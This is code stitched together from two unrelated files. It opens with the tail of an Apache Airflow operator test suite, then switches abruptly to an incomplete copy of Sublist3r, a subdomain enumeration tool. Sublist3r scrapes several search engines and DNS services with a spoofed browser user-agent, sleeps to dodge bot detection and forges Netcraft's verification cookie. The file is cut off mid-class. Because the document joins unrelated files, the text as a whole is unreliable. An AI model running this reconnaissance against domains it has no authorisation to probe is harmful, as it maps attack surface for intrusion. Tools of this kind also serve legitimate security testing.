op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captain_hook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
msg = 'Invalid arguments were passed to BashOperator (task_id: test_illegal_args).'
with conf_vars({('operators', 'allow_illegal_arguments'): 'True'}):
with self.assertWarns(PendingDeprecationWarning) as warning:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
assert any(msg in str(w) for w in warning.warnings)
def test_illegal_args_forbidden(self):
"""
Tests that operators raise exceptions on illegal arguments when
illegal arguments are not allowed.
"""
with self.assertRaises(AirflowException) as ctx:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
str(ctx.exception))
def test_bash_operator(self):
op = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
op = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
op = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
AirflowTaskTimeout,
op.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
op = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
AirflowException,
op.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_dryrun(self):
op = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
op.dry_run()
def test_sqlite(self):
import airflow.providers.sqlite.operators.sqlite
op = airflow.providers.sqlite.operators.sqlite.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
op = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
AirflowTaskTimeout,
op.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
op = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
op = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
op.execute = verify_templated_field
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self): # pylint: disable=invalid-length-returned
return NotImplemented
def __bool__(self):
return NotImplemented
op = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
op.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
from airflow.executors.sequential_executor import SequentialExecutor
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
proc = multiprocessing.Process(target=job.run)
proc.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
proc.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
op1 = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
op2 = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception: # pylint: disable=broad-except
pass
try:
op2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception: # pylint: disable=broad-except
pass
op1_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
op2_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(op1_fails))
self.assertEqual(1, len(op2_fails))
self.assertGreaterEqual(sum([f.duration for f in op2_fails]), 3)
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
execution_date = DEFAULT_DATE + timedelta(days=2)
execution_ds = execution_date.strftime('%Y-%m-%d')
execution_ds_nodash = execution_ds.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
run_id = f"{DagRunType.SCHEDULED.value}__{execution_date.isoformat()}"
dag.create_dagrun(run_id=run_id,
execution_date=execution_date,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=execution_date, end_date=execution_date)
ti = TI(task=task, execution_date=execution_date)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], execution_ds)
self.assertEqual(context['next_ds_nodash'], execution_ds_nodash)
self.assertEqual(context['prev_ds'], execution_ds)
self.assertEqual(context['prev_ds_nodash'], execution_ds_nodash)
if __name__ == '__main__':
unittest.main()
|
sublist3r.py
|
#!/usr/bin/env python
# coding: utf-8
# Sublist3r v1.0
# By Ahmed Aboul-Ela - twitter.com/aboul3la
# modules in standard library
import re
import sys
import os
import argparse
import time
import hashlib
import random
import multiprocessing
import threading
import socket
import json
from collections import Counter
# external modules
from Sublist3r.subbrute import subbrute
import dns.resolver
import requests
# Python 2.x and 3.x compatiablity
if sys.version > '3':
import urllib.parse as urlparse
import urllib.parse as urllib
else:
import urlparse
import urllib
# In case you cannot install some of the required development packages
# there's also an option to disable the SSL warning:
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except:
pass
# Check if we are running this on windows platform
is_windows = sys.platform.startswith('win')
# Console Colors
if is_windows:
# Windows deserves coloring too :D
G = '\033[92m' # green
Y = '\033[93m' # yellow
B = '\033[94m' # blue
R = '\033[91m' # red
W = '\033[0m' # white
try:
import win_unicode_console , colorama
win_unicode_console.enable()
colorama.init()
#Now the unicode will work ^_^
except:
# print("[!] Error: Coloring libraries not installed, no coloring will be used [Check the readme]")
G = Y = B = R = W = G = Y = B = R = W = ''
pass
else:
G = '\033[92m' # green
Y = '\033[93m' # yellow
B = '\033[94m' # blue
R = '\033[91m' # red
W = '\033[0m' # white
def no_color():
global G, Y, B, R, W
G = Y = B = R = W = ''
def banner():
print("""%s
____ _ _ _ _ _____
/ ___| _ _| |__ | (_)___| |_|___ / _ __
\___ \| | | | '_ \| | / __| __| |_ \| '__|
___) | |_| | |_) | | \__ \ |_ ___) | |
|____/ \__,_|_.__/|_|_|___/\__|____/|_|%s%s
# Coded By Ahmed Aboul-Ela - @aboul3la
""" % (R, W, Y))
def parser_error(errmsg):
banner()
print("Usage: python " + sys.argv[0] + " [Options] use -h for help")
print(R + "Error: " + errmsg + W)
sys.exit()
def parse_args():
# parse the arguments
parser = argparse.ArgumentParser(epilog='\tExample: \r\npython ' + sys.argv[0] + " -d google.com")
parser.error = parser_error
parser._optionals.title = "OPTIONS"
parser.add_argument('-d', '--domain', help="Domain name to enumerate it's subdomains", required=True)
parser.add_argument('-b', '--bruteforce', help='Enable the subbrute bruteforce module', nargs='?', default=False)
parser.add_argument('-p', '--ports', help='Scan the found subdomains against specified tcp ports')
parser.add_argument('-v', '--verbose', help='Enable Verbosity and display results in realtime', nargs='?', default=False)
parser.add_argument('-t', '--threads', help='Number of threads to use for subbrute bruteforce', type=int, default=30)
parser.add_argument('-e', '--engines', help='Specify a comma-separated list of search engines')
parser.add_argument('-o', '--output', help='Save the results to text file')
parser.add_argument('-n', '--no-color', help='Output without color', default=False, action='store_true')
return parser.parse_args()
def write_file(filename, subdomains):
# saving subdomains results to output file
print("%s[-] Saving results to file: %s%s%s%s" % (Y, W, R, filename, W))
with open(str(filename), 'wt') as f:
for subdomain in subdomains:
f.write(subdomain + os.linesep)
def subdomain_sorting_key(hostname):
"""Sorting key for subdomains
This sorting key orders subdomains from the top-level domain at the right
reading left, then moving '^' and 'www' to the top of their group. For
example, the following list is sorted correctly:
[
'example.com',
'www.example.com',
'a.example.com',
'www.a.example.com',
'b.a.example.com',
'b.example.com',
'example.net',
'www.example.net',
'a.example.net',
]
"""
parts = hostname.split('.')[::-1]
if parts[-1] == 'www':
return parts[:-1], 1
return parts, 0
class enumratorBase(object):
def __init__(self, base_url, engine_name, domain, subdomains=None, silent=False, verbose=True):
subdomains = subdomains or []
self.domain = urlparse.urlparse(domain).netloc
self.session = requests.Session()
self.subdomains = []
self.timeout = 25
self.base_url = base_url
self.engine_name = engine_name
self.silent = silent
self.verbose = verbose
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.8',
'Accept-Encoding': 'gzip',
}
self.print_banner()
def print_(self, text):
if not self.silent:
print(text)
return
def print_banner(self):
""" subclass can override this if they want a fancy banner :)"""
self.print_(G + "[-] Searching now in %s.." % (self.engine_name) + W)
return
def send_req(self, query, page_no=1):
url = self.base_url.format(query=query, page_no=page_no)
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def get_response(self, response):
if response is None:
return "NULL"
return response.text if hasattr(response, "text") else response.content
def check_max_subdomains(self, count):
if self.MAX_DOMAINS == 0:
return False
return count >= self.MAX_DOMAINS
def check_max_pages(self, num):
if self.MAX_PAGES == 0:
return False
return num >= self.MAX_PAGES
# override
def extract_domains(self, resp):
""" chlid class should override this function """
return
# override
def check_response_errors(self, resp):
""" chlid class should override this function
The function should return True if there are no errors and False otherwise
"""
return True
def should_sleep(self):
"""Some enumrators require sleeping to avoid bot detections like Google enumerator"""
return
def generate_query(self):
""" chlid class should override this function """
return
def get_page(self, num):
""" chlid class that user different pagnation counter should override this function """
return num + 10
def enumerate(self, altquery=False):
flag = True
page_no = 0
prev_links = []
retries = 0
while flag:
query = self.generate_query()
count = query.count(self.domain) # finding the number of subdomains found so far
# if they we reached the maximum number of subdomains in search query
# then we should go over the pages
if self.check_max_subdomains(count):
page_no = self.get_page(page_no)
if self.check_max_pages(page_no): # maximum pages for Google to avoid getting blocked
return self.subdomains
resp = self.send_req(query, page_no)
# check if there is any error occured
if not self.check_response_errors(resp):
return self.subdomains
links = self.extract_domains(resp)
# if the previous page hyperlinks was the similar to the current one, then maybe we have reached the last page
if links == prev_links:
retries += 1
page_no = self.get_page(page_no)
# make another retry maybe it isn't the last page
if retries >= 3:
return self.subdomains
prev_links = links
self.should_sleep()
return self.subdomains
class enumratorBaseThreaded(multiprocessing.Process, enumratorBase):
def __init__(self, base_url, engine_name, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
enumratorBase.__init__(self, base_url, engine_name, domain, subdomains, silent=silent, verbose=verbose)
multiprocessing.Process.__init__(self)
self.q = q
return
def run(self):
domain_list = self.enumerate()
for domain in domain_list:
self.q.append(domain)
class GoogleEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://google.com/search?q={query}&btnG=Search&hl=en-US&biw=&bih=&gbv=1&start={page_no}&filter=0"
self.engine_name = "Google"
self.MAX_DOMAINS = 11
self.MAX_PAGES = 200
super(GoogleEnum, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<cite.*?>(.*?)<\/cite>')
try:
links_list = link_regx.findall(resp)
for link in links_list:
link = re.sub('<span.*>', '', link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def check_response_errors(self, resp):
if (type(resp) is str) and 'Our systems have detected unusual traffic' in resp:
self.print_(R + "[!] Error: Google probably now is blocking our requests" + W)
self.print_(R + "[~] Finished now the Google Enumeration ..." + W)
return False
return True
def should_sleep(self):
time.sleep(5)
return
def generate_query(self):
if self.subdomains:
fmt = 'site:{domain} -www.{domain} -{found}'
found = ' -'.join(self.subdomains[:self.MAX_DOMAINS - 2])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain} -www.{domain}".format(domain=self.domain)
return query
class YahooEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://search.yahoo.com/search?p={query}&b={page_no}"
self.engine_name = "Yahoo"
self.MAX_DOMAINS = 10
self.MAX_PAGES = 0
super(YahooEnum, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def extract_domains(self, resp):
link_regx2 = re.compile('<span class=" fz-.*? fw-m fc-12th wr-bw.*?">(.*?)</span>')
link_regx = re.compile('<span class="txt"><span class=" cite fw-xl fz-15px">(.*?)</span>')
links_list = []
try:
links = link_regx.findall(resp)
links2 = link_regx2.findall(resp)
links_list = links + links2
for link in links_list:
link = re.sub("<(\/)?b>", "", link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if not subdomain.endswith(self.domain):
continue
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def should_sleep(self):
return
def get_page(self, num):
return num + 10
def generate_query(self):
if self.subdomains:
fmt = 'site:{domain} -domain:www.{domain} -domain:{found}'
found = ' -domain:'.join(self.subdomains[:77])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain}".format(domain=self.domain)
return query
class AskEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'http://www.ask.com/web?q={query}&page={page_no}&qid=8D6EE6BF52E0C04527E51F64F22C4534&o=0&l=dir&qsrc=998&qo=pagination'
self.engine_name = "Ask"
self.MAX_DOMAINS = 11
self.MAX_PAGES = 0
enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<p class="web-result-url">(.*?)</p>')
try:
links_list = link_regx.findall(resp)
for link in links_list:
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def get_page(self, num):
return num + 1
def generate_query(self):
if self.subdomains:
fmt = 'site:{domain} -www.{domain} -{found}'
found = ' -'.join(self.subdomains[:self.MAX_DOMAINS])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain} -www.{domain}".format(domain=self.domain)
return query
class BingEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.bing.com/search?q={query}&go=Submit&first={page_no}'
self.engine_name = "Bing"
self.MAX_DOMAINS = 30
self.MAX_PAGES = 0
enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent)
self.q = q
self.verbose = verbose
return
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<li class="b_algo"><h2><a href="(.*?)"')
link_regx2 = re.compile('<div class="b_title"><h2><a href="(.*?)"')
try:
links = link_regx.findall(resp)
links2 = link_regx2.findall(resp)
links_list = links + links2
for link in links_list:
link = re.sub('<(\/)?strong>|<span.*?>|<|>', '', link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def generate_query(self):
if self.subdomains:
fmt = 'domain:{domain} -www.{domain} -{found}'
found = ' -'.join(self.subdomains[:self.MAX_DOMAINS])
query = fmt.format(domain=self.domain, found=found)
else:
query = "domain:{domain} -www.{domain}".format(domain=self.domain)
return query
class BaiduEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.baidu.com/s?pn={page_no}&wd={query}&oq={query}'
self.engine_name = "Baidu"
self.MAX_DOMAINS = 2
self.MAX_PAGES = 760
enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.querydomain = self.domain
self.q = q
return
def extract_domains(self, resp):
links = list()
found_newdomain = False
subdomain_list = []
link_regx = re.compile('<a.*?class="c-showurl".*?>(.*?)</a>')
try:
links = link_regx.findall(resp)
for link in links:
link = re.sub('<.*?>|>|<| ', '', link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain.endswith(self.domain):
subdomain_list.append(subdomain)
if subdomain not in self.subdomains and subdomain != self.domain:
found_newdomain = True
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
if not found_newdomain and subdomain_list:
self.querydomain = self.findsubs(subdomain_list)
return links
def findsubs(self, subdomains):
count = Counter(subdomains)
subdomain1 = max(count, key=count.get)
count.pop(subdomain1, "None")
subdomain2 = max(count, key=count.get) if count else ''
return (subdomain1, subdomain2)
def check_response_errors(self, resp):
return True
def should_sleep(self):
time.sleep(random.randint(2, 5))
return
def generate_query(self):
if self.subdomains and self.querydomain != self.domain:
found = ' -site:'.join(self.querydomain)
query = "site:{domain} -site:www.{domain} -site:{found} ".format(domain=self.domain, found=found)
else:
query = "site:{domain} -site:www.{domain}".format(domain=self.domain)
return query
class NetcraftEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
self.base_url = 'https://searchdns.netcraft.com/?restriction=site+ends+with&host={domain}'
self.engine_name = "Netcraft"
super(NetcraftEnum, self).__init__(self.base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def req(self, url, cookies=None):
cookies = cookies or {}
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout, cookies=cookies)
except Exception as e:
self.print_(e)
resp = None
return resp
def should_sleep(self):
time.sleep(random.randint(1, 2))
return
def get_next(self, resp):
link_regx = re.compile('<a.*?href="(.*?)">Next Page')
link = link_regx.findall(resp)
url = 'http://searchdns.netcraft.com' + link[0]
return url
def create_cookies(self, cookie):
cookies = dict()
cookies_list = cookie[0:cookie.find(';')].split("=")
cookies[cookies_list[0]] = cookies_list[1]
# hashlib.sha1 requires utf-8 encoded str
cookies['netcraft_js_verification_response'] = hashlib.sha1(urllib.unquote(cookies_list[1]).encode('utf-8')).hexdigest()
return cookies
def get_cookies(self, headers):
if 'set-cookie' in headers:
cookies = self.create_cookies(headers['set-cookie'])
else:
cookies = {}
return cookies
def enumerate(self):
start_url = self.base_url.format(domain='example.com')
resp = self.req(start_url)
cookies = self.get_cookies(resp.headers)
url = self.base_url.format(domain=self.domain)
while True:
resp = self.get_response(self.req(url, cookies))
self.extract_domains(resp)
if 'Next Page' not in resp:
return self.subdomains
break
url = self.get_next(resp)
self.should_sleep()
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<a class="results-table__host" href="(.*?)"')
try:
links_list = link_regx.findall(resp)
for link in links_list:
subdomain = urlparse.urlparse(link).netloc
if not subdomain.endswith(self.domain):
continue
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
class DNSdumpster(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://dnsdumpster.com/'
self.live_subdomains = []
self.engine_name = "DNSdumpster"
self.q = q
self.lock = None
super(DNSdumpster, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def check_host(self, host):
is_valid = False
Resolver = dns.resolver.Resolver()
Resolver.nameservers = ['8.8.8.8', '8.8.4.4']
self.lock.acquire()
try:
ip = Resolver.query(host, 'A')[0].to_text()
if ip:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, host))
is_valid = True
self.live_subdomains.append(host)
except:
pass
self.lock.release()
return is_valid
def req(self, req_method, url, params=None):
params = params or {}
headers = dict(self.headers)
headers['Referer'] = 'https://dnsdumpster.com'
try:
if req_method == 'GET':
resp = self.session.get(url, headers=headers, timeout=self.timeout)
else:
resp = self.session.post(url, data=params, headers=headers, timeout=self.timeout)
except Exception as e:
self.print_(e)
resp = None
return self.get_response(resp)
def get_csrftoken(self, resp):
try:
csrf_regex = re.compile('<input type="hidden" name="csrfmiddlewaretoken" value="(.*?)">', re.S)
token = csrf_regex.findall(resp)[0]
return token.strip()
except Exception as e:
return ""
def enumerate(self):
self.lock = threading.BoundedSemaphore(value=70)
resp = self.req('GET', self.base_url)
token = self.get_csrftoken(resp)
params = {'csrfmiddlewaretoken': token, 'targetip': self.domain}
post_resp = self.req('POST', self.base_url, params)
self.extract_domains(post_resp)
for subdomain in self.subdomains:
t = threading.Thread(target=self.check_host, args=(subdomain,))
t.start()
t.join()
return self.live_subdomains
def extract_domains(self, resp):
tbl_regex = re.compile('<a name="hostanchor"><\/a>Host Records.*?<table.*?>(.*?)</table>', re.S)
link_regex = re.compile('<td class="col-md-4">(.*?)<br>', re.S)
links = []
try:
results_tbl = tbl_regex.findall(resp)[0]
except IndexError:
results_tbl = ''
links_list = link_regex.findall(results_tbl)
links = list(set(links_list))
for link in links:
subdomain = link.strip()
if not subdomain.endswith(self.domain):
continue
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
self.subdomains.append(subdomain.strip())
return links
class Virustotal(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.virustotal.com/ui/domains/{domain}/subdomains'
self.engine_name = "Virustotal"
self.q = q
super(Virustotal, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.url = self.base_url.format(domain=self.domain)
return
# the main send_req need to be rewritten
def send_req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception as e:
self.print_(e)
resp = None
return self.get_response(resp)
# # once the send_req is rewritten we don't need to call this function, the stock one should be ok
# def enumerate(self):
# while self.url != '':
# resp = self.send_req(self.url)
# resp = json.loads(resp)
# if 'error' in resp:
# self.print_(R + "[!] Error: Virustotal probably now is blocking our requests" + W)
# break
# if 'links' in resp and 'next' in resp['links']:
# self.url = resp['links']['next']
# else:
# self.url = ''
# self.extract_domains(resp)
# return self.subdomains
def extract_domains(self, resp):
#resp is already parsed as json
try:
for i in resp['data']:
if i['type'] == 'domain':
subdomain = i['id']
if not subdomain.endswith(self.domain):
continue
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
class ThreatCrowd(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={domain}'
self.engine_name = "ThreatCrowd"
self.q = q
super(ThreatCrowd, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def req(self, url):
